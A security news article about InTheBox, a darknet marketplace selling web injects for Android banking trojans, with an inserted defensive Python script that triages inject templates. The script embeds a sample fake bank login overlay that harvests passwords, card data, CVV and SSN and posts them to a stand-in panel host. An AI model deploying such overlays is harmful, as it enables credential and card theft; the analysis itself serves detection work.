Cybersecurity researchers have uncovered a darknet marketplace called InTheBox that caters specifically to mobile malware operators.
Since at least January 2020, the actor behind the criminal storefront is believed to have sold more than 400 custom web injects, organized by geography, to other adversaries looking to launch their own attacks.
“The automation enables other malicious actors to place orders for the most recent web injects for use in mobile malware,” Resecurity explained.
“InTheBox is the largest and most likely the only company in its market category to provide high-quality web injects for prevalent forms of mobile malware,” the company added.
A web inject is an overlay page that the trojan displays on top of a targeted banking or payment app. These pages typically resemble the legitimate bank login screen and entice unsuspecting users to enter sensitive information such as credentials, payment card data, Social Security numbers (SSN), and card verification values (CVV), which the operators then use to take over the bank account and commit fraud.
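To make concrete what such an overlay collects and where it sends it, here is an added triage script, not code from Resecurity or from the article, that parses an inject template and reports the sensitive fields it harvests and its exfiltration endpoints. The sample template, the "ExampleBank" brand and the `panel.example.invalid` host are constructed for illustration; the field-name patterns are assumptions about how injects name their inputs, not a list taken from the marketplace.

```python
"""Triage of Android banking-trojan web-inject (overlay) templates.

Added example: report which categories of sensitive data an overlay page
harvests and which URLs it posts them to. Standard library only.
"""
import re
from html.parser import HTMLParser

# Field-name substrings -> category of data the overlay collects (assumed
# naming conventions; ordered so the more specific patterns win).
SENSITIVE_PATTERNS = {
    "ssn": re.compile(r"(ssn|social)", re.I),
    "cvv": re.compile(r"(cvv|cvc|cvv2|security_?code)", re.I),
    "card_number": re.compile(r"(card|pan|ccnum|cc_number)", re.I),
    "expiry": re.compile(r"(exp|expiry|expiration)", re.I),
    "credentials": re.compile(r"(pass|pwd|pin|login|user)", re.I),
}
# Absolute URLs appearing as string literals inside inline scripts
# (fetch/XHR targets used for exfiltration).
URL_LITERAL_RE = re.compile(r"""['"](https?://[^'"]+)['"]""")


class InjectParser(HTMLParser):
    """Collect <title>, <form action>, <input> attributes and script URLs."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self._in_title = False
        self._in_script = False
        self.inputs = []        # (name, type, autocomplete)
        self.form_actions = []
        self.script_urls = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "script":
            self._in_script = True
        elif tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input":
            self.inputs.append((a.get("name") or a.get("id") or "",
                                (a.get("type") or "text").lower(),
                                (a.get("autocomplete") or "").lower()))

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False
        elif tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data.strip()
        elif self._in_script:
            self.script_urls.extend(URL_LITERAL_RE.findall(data))


def classify_field(name, itype, autocomplete):
    """Map one <input> to the category of sensitive data it collects, or None."""
    if itype == "password":
        return "credentials"
    if autocomplete.startswith("cc-csc"):
        return "cvv"
    if autocomplete.startswith("cc-number"):
        return "card_number"
    if autocomplete.startswith("cc-exp"):
        return "expiry"
    for category, pattern in SENSITIVE_PATTERNS.items():
        if pattern.search(name):
            return category
    return None


def analyze_inject(html_text):
    """Return the impersonated title, harvested data categories and exfil URLs."""
    p = InjectParser()
    p.feed(html_text)
    harvested = {c for c in (classify_field(*i) for i in p.inputs) if c}
    targets = sorted({u for u in p.form_actions + p.script_urls if u})
    return {"impersonates": p.title,
            "harvests": sorted(harvested),
            "exfil_targets": targets}


# Constructed sample overlay mimicking a fictitious bank's sign-in screen.
SAMPLE_INJECT = """<!doctype html>
<html><head><title>ExampleBank Mobile - Sign in</title></head>
<body>
<form id="login" action="https://panel.example.invalid/gate.php" method="post">
  <input name="username" type="text" autocomplete="username">
  <input name="password" type="password">
  <input name="cardNumber" type="tel" autocomplete="cc-number">
  <input name="exp" type="tel" autocomplete="cc-exp">
  <input name="cvv" type="tel" autocomplete="cc-csc">
  <input name="ssn" type="tel">
  <button type="submit">Continue</button>
</form>
<script>
  document.getElementById("login").onsubmit = function () {
    fetch("https://panel.example.invalid/api/collect",
          {method: "POST", body: new FormData(this)});
  };
</script>
</body></html>
"""

if __name__ == "__main__":
    report = analyze_inject(SAMPLE_INJECT)
    print("impersonates :", report["impersonates"])
    print("harvests     :", ", ".join(report["harvests"]))
    print("exfil targets:", ", ".join(report["exfil_targets"]))
```

Run over a folder of recovered templates, the same function gives a quick inventory of which brands a kit targets and which panel hosts to block or hunt for in proxy logs.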
InTheBox is accessible via the Tor anonymity network and offers a variety of web inject templates for sale, with the listing accessible only after the administrator has verified and activated the customer’s account.
Web injects can be purchased for $100 per month, or under the “unlim” tier, which grants an unlimited number of injects for the duration of the subscription. The unlimited plan costs between $2,475 and $5,888, depending on which trojans are supported.
Alien, Cerberus, ERMAC (and its successor MetaDroid), Hydra, and Octo are among the Android banking trojans supported by the service, the California-based cybersecurity company said.
The majority of high-demand injects are associated with payment services, such as digital banking and cryptocurrency exchanges, according to the researchers. “During November 2022, the actor arranged a significant update of approximately 144 injects to improve their visual design,” Resecurity noted.
Separately, Cyble disclosed a new malware-as-a-service (MaaS) operation called DuckLogs, which costs $69.99 for lifetime access and gives threat actors the ability to harvest sensitive data, hijack cryptocurrency transactions, and remotely take control of infected machines.